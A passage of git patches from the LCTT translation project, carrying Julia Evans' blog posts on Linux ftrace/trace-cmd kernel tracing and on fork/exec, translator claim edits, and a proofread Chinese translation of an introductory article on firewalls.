+Better yet, ftrace isn’t new! It’s been around since Linux kernel 2.6, or about 2008. [here’s the earliest documentation I found with some quick Gooogling][10]. So you might be able to use it even if you’re debugging an older system!
+
+I’ve known that ftrace exists for about 2.5 years now, but hadn’t gotten around to really learning it yet. I’m supposed to run a workshop tomorrow where I talk about ftrace, so today is the day we talk about it!
+
+### what’s ftrace?
+
+ftrace is a Linux kernel feature that lets you trace Linux kernel function calls. Why would you want to do that? Well, suppose you’re debugging a weird problem, and you’ve gotten to the point where you’re staring at the source code for your kernel version and wondering what **exactly** is going on.
+
+I don’t read the kernel source code very often when debugging, but occasionally I do! For example this week at work we had a program that was frozen and stuck spinning inside the kernel. Looking at what functions were being called helped us understand better what was happening in the kernel and what systems were involved (in that case, it was the virtual memory system)!
+
+I think ftrace is a bit of a niche tool (it’s definitely less broadly useful and harder to use than strace) but that it’s worth knowing about. So let’s learn about it!
+
+### first steps with ftrace
+
+Unlike strace and perf, ftrace isn’t a **program** exactly – you don’t just run `ftrace my_cool_function`. That would be too easy!
+
+If you read [Debugging the kernel using Ftrace][11] it starts out by telling you to `cd /sys/kernel/debug/tracing` and then do various filesystem manipulations.
+
+For me this is way too annoying – a simple example of using ftrace this way is something like
+
+```
+cd /sys/kernel/debug/tracing
+echo function > current_tracer
+echo do_page_fault > set_ftrace_filter
+cat trace
+
+```
+
+This filesystem interface to the tracing system (“put values in these magic files and things will happen”) seems theoretically possible to use but really not my preference.
+
+Luckily, team ftrace also thought this interface wasn’t that user friendly and so there is an easier-to-use interface called **trace-cmd**!!! trace-cmd is a normal program with command line arguments. We’ll use that! I found an intro to trace-cmd on LWN at [trace-cmd: A front-end for Ftrace][12].
+
+### getting started with trace-cmd: let’s trace just one function
+
+First, I needed to install `trace-cmd` with `sudo apt-get install trace-cmd`. Easy enough.
+
+For this first ftrace demo, I decided I wanted to know when my kernel was handling a page fault. When Linux allocates memory, it often does it lazily (“you weren’t _really_ planning to use that memory, right?“). This means that when an application tries to actually write to memory that it allocated, there’s a page fault and the kernel needs to give the application physical memory to use.
+
+Let’s start `trace-cmd` and make it trace the `do_page_fault` function!
+
+```
+$ sudo trace-cmd record -p function -l do_page_fault
+ plugin 'function'
+Hit Ctrl^C to stop recording
+
+```
+
+I ran it for a few seconds and then hit `Ctrl+C`. Awesome! It created a 2.5MB file called `trace.dat`. Let’s see what’s that file!
+
+```
+$ sudo trace-cmd report
+ chrome-15144 [000] 11446.466121: function: do_page_fault
+ chrome-15144 [000] 11446.467910: function: do_page_fault
+ chrome-15144 [000] 11446.469174: function: do_page_fault
+ chrome-15144 [000] 11446.474225: function: do_page_fault
+ chrome-15144 [000] 11446.474386: function: do_page_fault
+ chrome-15144 [000] 11446.478768: function: do_page_fault
+ CompositorTileW-15154 [001] 11446.480172: function: do_page_fault
+ chrome-1830 [003] 11446.486696: function: do_page_fault
+ CompositorTileW-15154 [001] 11446.488983: function: do_page_fault
+ CompositorTileW-15154 [001] 11446.489034: function: do_page_fault
+ CompositorTileW-15154 [001] 11446.489045: function: do_page_fault
+
+```
+
+This is neat – it shows me the process name (chrome), process ID (15144), CPU (000), and function that got traced.
+
+By looking at the whole report, (`sudo trace-cmd report | grep chrome`) I can see that we traced for about 1.5 seconds and in that time Chrome had about 500 page faults. Cool! We have done our first ftrace!
+
+### next ftrace trick: let’s trace a process!
+
+Okay, but just seeing one function is kind of boring! Let’s say I want to know everything that’s happening for one program. I use a static site generator called Hugo. What’s the kernel doing for Hugo?
+
+Hugo’s PID on my computer right now is 25314, so I recorded all the kernel functions with:
+
+```
+sudo trace-cmd record --help # I read the help!
+sudo trace-cmd record -p function -P 25314 # record for PID 25314
+
+```
+
+`sudo trace-cmd report` printed out 18,000 lines of output. If you’re interested, you can see [all 18,000 lines here][13].
+
+18,000 lines is a lot so here are some interesting excerpts.
+
+This looks like what happens when the `clock_gettime` system call runs. Neat!
+
+```
+ compat_SyS_clock_gettime
+ SyS_clock_gettime
+ clockid_to_kclock
+ posix_clock_realtime_get
+ getnstimeofday64
+ __getnstimeofday64
+ arch_counter_read
+ __compat_put_timespec
+
+```
+
+This is something related to process scheduling:
+
+```
+ cpufreq_sched_irq_work
+ wake_up_process
+ try_to_wake_up
+ _raw_spin_lock_irqsave
+ do_raw_spin_lock
+ _raw_spin_lock
+ do_raw_spin_lock
+ walt_ktime_clock
+ ktime_get
+ arch_counter_read
+ walt_update_task_ravg
+ exiting_task
+
+```
+
+Being able to see all these function calls is pretty cool, even if I don’t quite understand them.
+
+### “function graph” tracing
+
+There’s another tracing mode called `function_graph`. This is the same as the function tracer except that it instruments both entering _and_ exiting a function. [Here’s the output of that tracer][14]
+
+```
+sudo trace-cmd record -p function_graph -P 25314
+
+```
+
+Again, here’s a snipped (this time from the futex code)
+
+```
+ | futex_wake() {
+ | get_futex_key() {
+ | get_user_pages_fast() {
+ 1.458 us | __get_user_pages_fast();
+ 4.375 us | }
+ | __might_sleep() {
+ 0.292 us | ___might_sleep();
+ 2.333 us | }
+ 0.584 us | get_futex_key_refs();
+ | unlock_page() {
+ 0.291 us | page_waitqueue();
+ 0.583 us | __wake_up_bit();
+ 5.250 us | }
+ 0.583 us | put_page();
++ 24.208 us | }
+
+```
+
+We see in this example that `get_futex_key` gets called right after `futex_wake`. Is that what really happens in the source code? We can check!! [Here’s the definition of futex_wake in Linux 4.4][15] (my kernel version).
+
+I’ll save you a click: it looks like this:
+
+```
+static int
+futex_wake(u32 __user *uaddr, unsigned int flags, int nr_wake, u32 bitset)
+{
+ struct futex_hash_bucket *hb;
+ struct futex_q *this, *next;
+ union futex_key key = FUTEX_KEY_INIT;
+ int ret;
+ WAKE_Q(wake_q);
+
+ if (!bitset)
+ return -EINVAL;
+
+ ret = get_futex_key(uaddr, flags & FLAGS_SHARED, &key, VERIFY_READ);
+
+```
+
+So the first function called in `futex_wake` really is `get_futex_key`! Neat! Reading the function trace was definitely an easier way to find that out than by reading the kernel code, and it’s nice to see how long all of the functions took.
+
+### How to know what functions you can trace
+
+If you run `sudo trace-cmd list -f` you’ll get a list of all the functions you can trace. That’s pretty simple but it’s important.
+
+### one last thing: events!
+
+So, now we know how to trace functions in the kernel! That’s really cool!
+
+There’s one more class of thing we can trace though! Some events don’t correspond super well to function calls. For example, you might want to knowwhen a program is scheduled on or off the CPU! You might be able to figure that out by peering at function calls, but I sure can’t.
+
+So the kernel also gives you a few events so you can see when a few important things happen. You can see a list of all these events with `sudo cat /sys/kernel/debug/tracing/available_events`
+
+I looked at all the sched_switch events. I’m not exactly sure what sched_switch is but it’s something to do with scheduling I guess.
+
+```
+sudo cat /sys/kernel/debug/tracing/available_events
+sudo trace-cmd record -e sched:sched_switch
+sudo trace-cmd report
+
+```
+
+The output looks like this:
+
+```
+ 16169.624862: Chrome_ChildIOT:24817 [112] S ==> chrome:15144 [120]
+ 16169.624992: chrome:15144 [120] S ==> swapper/3:0 [120]
+ 16169.625202: swapper/3:0 [120] R ==> Chrome_ChildIOT:24817 [112]
+ 16169.625251: Chrome_ChildIOT:24817 [112] R ==> chrome:1561 [112]
+ 16169.625437: chrome:1561 [112] S ==> chrome:15144 [120]
+
+```
+
+so you can see it switching from PID 24817 -> 15144 -> kernel -> 24817 -> 1561 -> 15114\. (all of these events are on the same CPU)
+
+### how does ftrace work?
+
+ftrace is a dynamic tracing system. This means that when I start ftracing a kernel function, the **function’s code gets changed**. So – let’s suppose that I’m tracing that `do_page_fault` function from before. The kernel will insert some extra instructions in the assembly for that function to notify the tracing system every time that function gets called. The reason it can add extra instructions is that Linux compiles in a few extra NOP instructions into every function, so there’s space to add tracing code when needed.
+
+This is awesome because it means that when I’m not using ftrace to trace my kernel, it doesn’t affect performance at all. When I do start tracing, the more functions I trace, the more overhead it’ll have.
+
+(probably some of this is wrong, but this is how I think ftrace works anyway)
+
+### use ftrace more easily: brendan gregg’s tools & kernelshark
+
+As we’ve seen in this post, you need to think quite a lot about what individual kernel functions / events do to use ftrace directly. This is cool, but it’s also a lot of work!
+
+Brendan Gregg (our linux debugging tools hero) has repository of tools that use ftrace to give you information about various things like IO latency. They’re all in his [perf-tools][16] repository on GitHub.
+
+The tradeoff here is that they’re easier to use, but you’re limited to things that Brendan Gregg thought of & decided to make a tool for. Which is a lot of things! :)
+
+Another tool for visualizing the output of ftrace better is [kernelshark][17]. I haven’t played with it much yet but it looks useful. You can install it with `sudo apt-get install kernelshark`.
+
+### a new superpower
+
+I’m really happy I took the time to learn a little more about ftrace today! Like any kernel tool, it’ll work differently between different kernel versions, but I hope that you find it useful one day.
+
+### an index of ftrace articles
+
+Finally, here’s a list of a bunch of ftrace articles I found. Many of them are on LWN (Linux Weekly News), which is a pretty great source of writing on Linux. (you can buy a [subscription][18]!)
+
+* [Debugging the kernel using Ftrace - part 1][1] (Dec 2009, Steven Rostedt)
+
+* [Debugging the kernel using Ftrace - part 2][2] (Dec 2009, Steven Rostedt)
+
+* [Secrets of the Linux function tracer][3] (Jan 2010, Steven Rostedt)
+
+* [trace-cmd: A front-end for Ftrace][4] (Oct 2010, Steven Rostedt)
+
+* [Using KernelShark to analyze the real-time scheduler][5] (2011, Steven Rostedt)
+
+* [Ftrace: The hidden light switch][6] (2014, Brendan Gregg)
+
+* the kernel documentation: (which is quite useful) [Documentation/ftrace.txt][7]
+
+* documentation on events you can trace [Documentation/events.txt][8]
+
+* some docs on ftrace design for linux kernel devs (not as useful, but interesting) [Documentation/ftrace-design.txt][9]
+
+--------------------------------------------------------------------------------
+
+via: https://jvns.ca/blog/2017/03/19/getting-started-with-ftrace/
+
+作者:[Julia Evans ][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://jvns.ca
+[1]:https://lwn.net/Articles/365835/
+[2]:https://lwn.net/Articles/366796/
+[3]:https://lwn.net/Articles/370423/
+[4]:https://lwn.net/Articles/410200/
+[5]:https://lwn.net/Articles/425583/
+[6]:https://lwn.net/Articles/608497/
+[7]:https://raw.githubusercontent.com/torvalds/linux/v4.4/Documentation/trace/ftrace.txt
+[8]:https://raw.githubusercontent.com/torvalds/linux/v4.4/Documentation/trace/events.txt
+[9]:https://raw.githubusercontent.com/torvalds/linux/v4.4/Documentation/trace/ftrace-design.txt
+[10]:https://lwn.net/Articles/290277/
+[11]:https://lwn.net/Articles/365835/
+[12]:https://lwn.net/Articles/410200/
+[13]:https://gist.githubusercontent.com/jvns/e5c2d640f7ec76ed9ed579be1de3312e/raw/78b8425436dc4bb5bb4fa76a4f85d5809f7d1ef2/trace-cmd-report.txt
+[14]:https://gist.githubusercontent.com/jvns/f32e9b06bcd2f1f30998afdd93e4aaa5/raw/8154d9828bb895fd6c9b0ee062275055b3775101/function_graph.txt
+[15]:https://github.com/torvalds/linux/blob/v4.4/kernel/futex.c#L1313-L1324
+[16]:https://github.com/brendangregg/perf-tools
+[17]:https://lwn.net/Articles/425583/
+[18]:https://lwn.net/subscribe/Info
From 254007f19b4f1d510dfa9f621c6879f7af79aefe Mon Sep 17 00:00:00 2001
From: Ezio
Date: Sat, 13 Jan 2018 21:47:49 +0800
Subject: [PATCH 308/371] =?UTF-8?q?20180113-8=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ppens when you start a process on Linux.md | 154 ++++++++++++++++++
1 file changed, 154 insertions(+)
create mode 100644 sources/tech/20161004 What happens when you start a process on Linux.md
diff --git a/sources/tech/20161004 What happens when you start a process on Linux.md b/sources/tech/20161004 What happens when you start a process on Linux.md
new file mode 100644
index 0000000000..41cc9424ea
--- /dev/null
+++ b/sources/tech/20161004 What happens when you start a process on Linux.md
@@ -0,0 +1,154 @@
+What happens when you start a process on Linux?
+===========================================================
+
+
+This is about how fork and exec works on Unix. You might already know about this, but some people don’t, and I was surprised when I learned it a few years back!
+
+So. You want to start a process. We’ve talked a lot about **system calls** on this blog – every time you start a process, or open a file, that’s a system call. So you might think that there’s a system call like this
+
+```
+start_process(["ls", "-l", "my_cool_directory"])
+
+```
+
+This is a reasonable thing to think and apparently it’s how it works in DOS/Windows. I was going to say that this _isn’t_ how it works on Linux. But! I went and looked at the docs and apparently there is a [posix_spawn][2] system call that does basically this. Shows what I know. Anyway, we’re not going to talk about that.
+
+### fork and exec
+
+`posix_spawn` on Linux is behind the scenes implemented in terms of 2 system calls called `fork` and `exec` (actually `execve`), which are what people usually actually use anyway. On OS X apparently people use `posix_spawn` and fork/exec are discouraged! But we’ll talk about Linux.
+
+Every process in Linux lives in a “process tree”. You can see that tree by running `pstree`. The root of the tree is `init`, with PID 1\. Every process (except init) has a parent, and any process has many children.
+
+So, let’s say I want to start a process called `ls` to list a directory. Do I just have a baby `ls`? No!
+
+Instead of having children, what I do is you have a child that is a clone of myself, and then that child gets its brain eaten and turns into `ls`. Really.
+
+We start out like this:
+
+```
+my parent
+ |- me
+
+```
+
+Then I run `fork()`. I have a child which is a clone of myself.
+
+```
+my parent
+ |- me
+ |-- clone of me
+
+```
+
+Then I organize it so that my child runs `exec("ls")`. That leaves us with
+
+```
+my parent
+ |- me
+ |-- ls
+
+```
+
+and once ls exits, I’ll be all by myself again. Almost
+
+```
+my parent
+ |- me
+ |-- ls (zombie)
+
+```
+
+At this point ls is actually a zombie process! That means it’s dead, but it’s waiting around for me in case I want to check on its return value (using the `wait` system call.) Once I get its return value, I will really be all alone again.
+
+```
+my parent
+ |- me
+
+```
+
+### what fork and exec looks like in code
+
+This is one of the exercises you have to do if you’re going to write a shell (which is a very fun and instructive project! Kamal has a great workshop on Github about how to do it: [https://github.com/kamalmarhubi/shell-workshop][3])
+
+It turns out that with a bit of work & some C or Python skills you can write a very simple shell (like bash!) in C or Python in just a few hours (at least if you have someone sitting next to you who knows what they’re doing, longer if not :)). I’ve done this and it was awesome.
+
+Anyway, here’s what fork and exec look like in a program. I’ve written fake C pseudocode. Remember that [fork can fail!][4]
+
+```
+int pid = fork();
+// now i am split in two! augh!
+// who am I? I could be either the child or the parent
+if (pid == 0) {
+ // ok I am the child process
+ // ls will eat my brain and I'll be a totally different process
+ exec(["ls"])
+} else if (pid == -1) {
+ // omg fork failed this is a disaster
+} else {
+ // ok i am the parent
+ // continue my business being a cool program
+ // I could wait for the child to finish if I want
+}
+
+```
+
+### ok what does it mean for your brain to be eaten julia
+
+Processes have a lot of attributes!
+
+You have
+
+* open files (including open network connections)
+
+* environment variables
+
+* signal handlers (what happens when you run Ctrl+C on the program?)
+
+* a bunch of memory (your “address space”)
+
+* registers
+
+* an “executable” that you ran (/proc/$pid/exe)
+
+* cgroups and namespaces (“linux container stuff”)
+
+* a current working directory
+
+* the user your program is running as
+
+* some other stuff that I’m forgetting
+
+When you run `execve` and have another program eat your brain, actually almost everything stays the same! You have the same environment variables and signal handlers and open files and more.
+
+The only thing that changes is, well, all of your memory and registers and the program that you’re running. Which is a pretty big deal.
+
+### why is fork not super expensive (or: copy on write)
+
+You might ask “julia, what if I have a process that’s using 2GB of memory! Does that mean every time I start a subprocess all that 2GB of memory gets copied?! That sounds expensive!”
+
+It turns out that Linux implements “copy on write” for fork() calls, so that for all the 2GB of memory in the new process it’s just like “look at the old process! it’s the same!”. And then if the either process writes any memory, then at that point it’ll start copying. But if the memory is the same in both processes, there’s no need to copy!
+
+### why you might care about all this
+
+Okay, julia, this is cool trivia, but why does it matter? Do the details about which signal handlers or environment variables get inherited or whatever actually make a difference in my day-to-day programming?
+
+Well, maybe! For example, there’s this [delightful bug on Kamal’s blog][5]. It talks about how Python sets the signal handler for SIGPIPE to ignore. So if you run a program from inside Python, by default it will ignore SIGPIPE! This means that the program will **behave differently** depending on whether you started it from a Python script or from your shell! And in this case it was causing a weird bug!
+
+So, your program’s environment (environment, signal handlers, etc.) can matter! It inherits its environment from its parent process, whatever that was! This can sometimes be a useful thing to know when debugging.
+
+--------------------------------------------------------------------------------
+
+via: https://jvns.ca/blog/2016/10/04/exec-will-eat-your-brain/
+
+作者:[ Julia Evans][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://jvns.ca
+[1]:https://jvns.ca/categories/favorite
+[2]:http://man7.org/linux/man-pages/man3/posix_spawn.3.html
+[3]:https://github.com/kamalmarhubi/shell-workshop
+[4]:https://rachelbythebay.com/w/2014/08/19/fork/
+[5]:http://kamalmarhubi.com/blog/2015/06/30/my-favourite-bug-so-far-at-the-recurse-center/
From 5c8184bf195212f3c250d7957fc076691f1200c7 Mon Sep 17 00:00:00 2001
From: jessie-pang <35220454+jessie-pang@users.noreply.github.com>
Date: Sat, 13 Jan 2018 22:10:50 +0800
Subject: [PATCH 309/371] Update 20161004 What happens when you start a process
on Linux.md
---
.../20161004 What happens when you start a process on Linux.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20161004 What happens when you start a process on Linux.md b/sources/tech/20161004 What happens when you start a process on Linux.md
index 41cc9424ea..0cd1247c9b 100644
--- a/sources/tech/20161004 What happens when you start a process on Linux.md
+++ b/sources/tech/20161004 What happens when you start a process on Linux.md
@@ -1,3 +1,5 @@
+Translating by jessie-pang
+
What happens when you start a process on Linux?
===========================================================
From eec3b4d8cfb42fbf14a768811987848721d7eea5 Mon Sep 17 00:00:00 2001
From: Chenguang
Date: Sat, 13 Jan 2018 22:22:48 +0800
Subject: [PATCH 310/371] Update 20150615 Let-s Build A Simple Interpreter.
Part 1..md
Translating Let-s build a simple interpreter Part1.md
---
.../tech/20150615 Let-s Build A Simple Interpreter. Part 1..md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20150615 Let-s Build A Simple Interpreter. Part 1..md b/sources/tech/20150615 Let-s Build A Simple Interpreter. Part 1..md
index 4c0d541a5a..9a815f2852 100644
--- a/sources/tech/20150615 Let-s Build A Simple Interpreter. Part 1..md
+++ b/sources/tech/20150615 Let-s Build A Simple Interpreter. Part 1..md
@@ -1,3 +1,4 @@
+// Translating by Linchenguang....
Let’s Build A Simple Interpreter. Part 1.
======
From 5d58d05ab6864f908de5d4f32dbfc4e4240fdcd3 Mon Sep 17 00:00:00 2001
From: Torival
Date: Sat, 13 Jan 2018 22:56:05 +0800
Subject: [PATCH 311/371] Update 20140210 Three steps to learning GDB.md
---
sources/tech/20140210 Three steps to learning GDB.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/sources/tech/20140210 Three steps to learning GDB.md b/sources/tech/20140210 Three steps to learning GDB.md
index 94279a2374..3e94e3d77f 100644
--- a/sources/tech/20140210 Three steps to learning GDB.md
+++ b/sources/tech/20140210 Three steps to learning GDB.md
@@ -1,4 +1,4 @@
-Three steps to learning GDB
+Translating by Torival Three steps to learning GDB
============================================================
Debugging C programs used to scare me a lot. Then I was writing my [operating system][2] and I had so many bugs to debug! I was extremely fortunate to be using the emulator qemu, which lets me attach a debugger to my operating system. The debugger is called `gdb`.
From 5f643da6f3ed5a75670ac5af0a471aaaaadc7e02 Mon Sep 17 00:00:00 2001
From: Torival
Date: Sat, 13 Jan 2018 22:57:21 +0800
Subject: [PATCH 312/371] Update 20180111 BASH drivers, start your engines.md
---
sources/tech/20180111 BASH drivers, start your engines.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/sources/tech/20180111 BASH drivers, start your engines.md b/sources/tech/20180111 BASH drivers, start your engines.md
index 7126bea3e0..e5f8631e39 100644
--- a/sources/tech/20180111 BASH drivers, start your engines.md
+++ b/sources/tech/20180111 BASH drivers, start your engines.md
@@ -1,4 +1,4 @@
-BASH drivers, start your engines
+Translating by Torival BASH drivers, start your engines
======
![](http://www.thelinuxrain.com/content/01-articles/201-bash-drivers-start-your-engines/headimage.jpg)
From fbf3e9ef336e12016ef2d92b8bf4f7d5435f04a3 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 14 Jan 2018 01:14:16 +0800
Subject: [PATCH 313/371] PRF:20171011 What is a firewall.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@zjon 翻译的不错。原文有些问题,我适当调整了。
---
.../tech/20171011 What is a firewall.md | 51 ++++++++++---------
1 file changed, 27 insertions(+), 24 deletions(-)
diff --git a/translated/tech/20171011 What is a firewall.md b/translated/tech/20171011 What is a firewall.md
index cdbf18a5c9..d854340ab6 100644
--- a/translated/tech/20171011 What is a firewall.md
+++ b/translated/tech/20171011 What is a firewall.md
@@ -1,66 +1,69 @@
什么是防火墙?
=====
+
+> 流行的防火墙是多数组织主要的边界防御。
+
+![](https://images.techhive.com/images/article/2017/04/firewall-100716789-large.jpg)
+
基于网络的防火墙已经在美国企业无处不在,因为它们证实了抵御日益增长的威胁的防御能力。
-通过网络测试公司 NSS 实验室最近的一项研究发现高达 80% 的美国大型企业运行着下一代防火墙。研究公司 IDC 评估防火墙和相关的统一威胁管理市场营业额在 2015 是 76 亿美元,预计到 2020 年底将达到 127 亿美元。
+通过网络测试公司 NSS 实验室最近的一项研究发现,高达 80% 的美国大型企业运行着下一代防火墙。研究公司 IDC 评估防火墙和相关的统一威胁管理市场的营业额在 2015 是 76 亿美元,预计到 2020 年底将达到 127 亿美元。
-**如果你想提升,这里是[What to consider when deploying a next generation firewall][1]**
+**如果你想升级,这里是《[当部署下一代防火墙时要考虑什么》][1]**
### 什么是防火墙?
-防火墙充当一个监控流量的边界防御工具,要么允许它要么屏蔽它。 多年来,防火墙的功能不断增强,现在大多数防火墙不仅可以阻止已知的一组威胁,并执行高级访问控制列表策略,还可以深入检查各个包的流量和测试包,以确定它们是否安全。大多数防火墙被部署为网络硬件,用于处理流量和允许终端用户配置和管理系统的软件。越来越多的软件版防火墙部署到高度虚拟机环境中执行策略在被隔离的网络或 IaaS 公有云中。
+防火墙作为一个边界防御工具,其监控流量——要么允许它、要么屏蔽它。 多年来,防火墙的功能不断增强,现在大多数防火墙不仅可以阻止已知的一些威胁、执行高级访问控制列表策略,还可以深入检查流量中的每个数据包,并测试包以确定它们是否安全。大多数防火墙都部署为用于处理流量的网络硬件,和允许终端用户配置和管理系统的软件。越来越多的软件版防火墙部署到高度虚拟化的环境中,以在被隔离的网络或 IaaS 公有云中执行策略。
-随着防火墙技术的进步在过去十年中创造了新的防火墙部署选项,所以现在对于部署防火墙的最终用户来说,有一些选择。这些选择包括:
+随着防火墙技术的进步,在过去十年中创造了新的防火墙部署选择,所以现在对于部署防火墙的最终用户来说,有了更多选择。这些选择包括:
### 有状态的防火墙
- 当首次创造防火墙时,它们是无状态的,这意味着流量通过硬件,在检查被监视的每个网络包流量的过程中,并单独屏蔽或允许它。从1990年代中后期开始,防火墙的第一个主要进展是引入状态。有状态防火墙在更全面的上下文中检查流量,同时考虑到网络连接的工作状态和特性,以提供更全面的防火墙。例如,维持这状态的防火墙允许某些流量访问某些用户,同时阻塞其他用户的同一流量。
-### 下一代防火墙
- 多年来,防火墙增加了多种新的特性,包括深度包检查、入侵检测以及对加密流量的预防和检查。下一代防火墙(NGFWs)是指有许多先进的功能集成到防火墙的防火墙。
+当防火墙首次创造出来时,它们是无状态的,这意味着流量所通过的硬件当单独地检查被监视的每个网络流量包时,屏蔽或允许是隔离的。从 1990 年代中后期开始,防火墙的第一个主要进展是引入了状态。有状态防火墙在更全面的上下文中检查流量,同时考虑到网络连接的工作状态和特性,以提供更全面的防火墙。例如,维持这个状态的防火墙可以允许某些流量访问某些用户,同时对其他用户阻塞同一流量。
### 基于代理的防火墙
这些防火墙充当请求数据的最终用户和数据源之间的网关。在传递给最终用户之前,所有的流量都通过这个代理过滤。这通过掩饰信息的原始请求者的身份来保护客户端不受威胁。
-### Web 应用防火墙
+### Web 应用防火墙(WAF)
-这些防火墙位于特定应用程序的前面,而不是在更广阔的网络的入口或则出口上。而基于代理的防火墙通常被认为是保护终端客户,WAFs 通常被认为是保护应用服务器。
+这些防火墙位于特定应用的前面,而不是在更广阔的网络的入口或者出口上。基于代理的防火墙通常被认为是保护终端客户的,而 WAF 则被认为是保护应用服务器的。
### 防火墙硬件
-防火墙硬件通常是一个简单的服务器,它可以充当路由器来过滤流量和运行防火墙软件。这些设备放置在企业网络的边缘,路由器和 Internet 服务提供商的连接点之间。通常企业可能在整个数据中心部署十几个物理防火墙。 用户需要根据用户基数的大小和 Internet 连接的速率来确定防火墙需要支持的吞吐量容量。
+防火墙硬件通常是一个简单的服务器,它可以充当路由器来过滤流量和运行防火墙软件。这些设备放置在企业网络的边缘,位于路由器和 Internet 服务提供商(ISP)的连接点之间。通常企业可能在整个数据中心部署十几个物理防火墙。 用户需要根据用户基数的大小和 Internet 连接的速率来确定防火墙需要支持的吞吐量容量。
### 防火墙软件
-通常,终端用户部署多个防火墙硬件端和一个中央防火墙软件系统来管理部署。 这个中心系统是配置策略和特性的地方,在那里可以进行分析,并可以对威胁作出响应。
+通常,终端用户部署多个防火墙硬件端和一个中央防火墙软件系统来管理该部署。 这个中心系统是配置策略和特性的地方,在那里可以进行分析,并可以对威胁作出响应。
-### 下一代防火墙
+### 下一代防火墙(NGFW)
-多年来,防火墙增加了多种新的特性,包括深度包检查、入侵检测以及对加密流量的预防和检查。下一代防火墙(NGFWs)是指集成了这些先进功能的防火墙,这里描述的是它们中的一些。
+多年来,防火墙增加了多种新的特性,包括深度包检查、入侵检测和防御以及对加密流量的检查。下一代防火墙(NGFW)是指集成了许多先进的功能的防火墙。
-### 有状态的检测
+#### 有状态的检测
阻止已知不需要的流量,这是基本的防火墙功能。
-### 抵御病毒
+#### 反病毒
在网络流量中搜索已知病毒和漏洞,这个功能有助于防火墙接收最新威胁的更新,并不断更新以保护它们。
-### 入侵防御系统
+#### 入侵防御系统(IPS)
-这类安全产品可以部署为一个独立的产品,但 IPS 功能正逐步融入 NGFWs。 虽然基本的防火墙技术识别和阻止某些类型的网络流量,但 IPS 使用更多的细粒度安全措施,如签名跟踪和异常检测,以防止不必要的威胁进入公司网络。 IPS 系统已经取代了以前这一技术的版本,入侵检测系统(IDS)的重点是识别威胁而不是遏制它们。
+这类安全产品可以部署为一个独立的产品,但 IPS 功能正逐步融入 NGFW。 虽然基本的防火墙技术可以识别和阻止某些类型的网络流量,但 IPS 使用更细粒度的安全措施,如签名跟踪和异常检测,以防止不必要的威胁进入公司网络。 这一技术的以前版本是入侵检测系统(IDS),其重点是识别威胁而不是遏制它们,已经被 IPS 系统取代了。
-### 深度包检测(DPI)
+#### 深度包检测(DPI)
-DPI 可部分或用于与 IPS 的结合,但其仍然成为一个 NGFWs 的重要特征,因为它提供细粒度分析的能力,具体到流量包和流量数据的头文件。DPI 还可以用来监测出站流量,以确保敏感信息不会离开公司网络,这种技术称为数据丢失预防(DLP)。
+DPI 可作为 IPS 的一部分或与其结合使用,但其仍然成为一个 NGFW 的重要特征,因为它提供细粒度分析流量的能力,可以具体到流量包头和流量数据。DPI 还可以用来监测出站流量,以确保敏感信息不会离开公司网络,这种技术称为数据丢失防御(DLP)。
-### SSL 检测
+#### SSL 检测
-安全套接字层(SSL)检测是一个检测加密流量来测试威胁的方法。随着越来越多的流量进行加密,SSL 检测成为 DPI 技术,NGFWs 正在实施的一个重要组成部分。SSL 检测作为一个缓冲区,它在送到最终目的地之前解码流量以检测它。
+安全套接字层(SSL)检测是一个检测加密流量来测试威胁的方法。随着越来越多的流量进行加密,SSL 检测成为 NGFW 正在实施的 DPI 技术的一个重要组成部分。SSL 检测作为一个缓冲区,它在送到最终目的地之前解码流量以检测它。
-### 沙盒
+#### 沙盒
-这个是被卷入 NGFWs 中的一个较新的特性,它指防火墙接收某些未知的流量或者代码,并在一个测试环境运行,以确定它是否是邪恶的能力。
+这个是被卷入 NGFW 中的一个较新的特性,它指防火墙接收某些未知的流量或者代码,并在一个测试环境运行,以确定它是否存在问题的能力。
--------------------------------------------------------------------------------
@@ -68,7 +71,7 @@ via: https://www.networkworld.com/article/3230457/lan-wan/what-is-a-firewall-per
作者:[Brandon Butler][a]
译者:[zjon](https://github.com/zjon)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From b292e4095abb513c56ada3c92ab42634e02d036f Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 14 Jan 2018 01:14:56 +0800
Subject: [PATCH 314/371] PUB:20171011 What is a firewall.md
@zjon https://linux.cn/article-9233-1.html
---
{translated/tech => published}/20171011 What is a firewall.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20171011 What is a firewall.md (100%)
diff --git a/translated/tech/20171011 What is a firewall.md b/published/20171011 What is a firewall.md
similarity index 100%
rename from translated/tech/20171011 What is a firewall.md
rename to published/20171011 What is a firewall.md
From f99d0f86eac06813976fa4bc28f5b546bb5d8f29 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 14 Jan 2018 10:07:29 +0800
Subject: [PATCH 315/371] PRF:20170925 A Commandline Fuzzy Search Tool For
Linux.md
@lujun9972
---
...Commandline Fuzzy Search Tool For Linux.md | 76 +++++++++++--------
1 file changed, 43 insertions(+), 33 deletions(-)
diff --git a/translated/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md b/translated/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
index 9d16aaf1aa..d76309f820 100644
--- a/translated/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
+++ b/translated/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
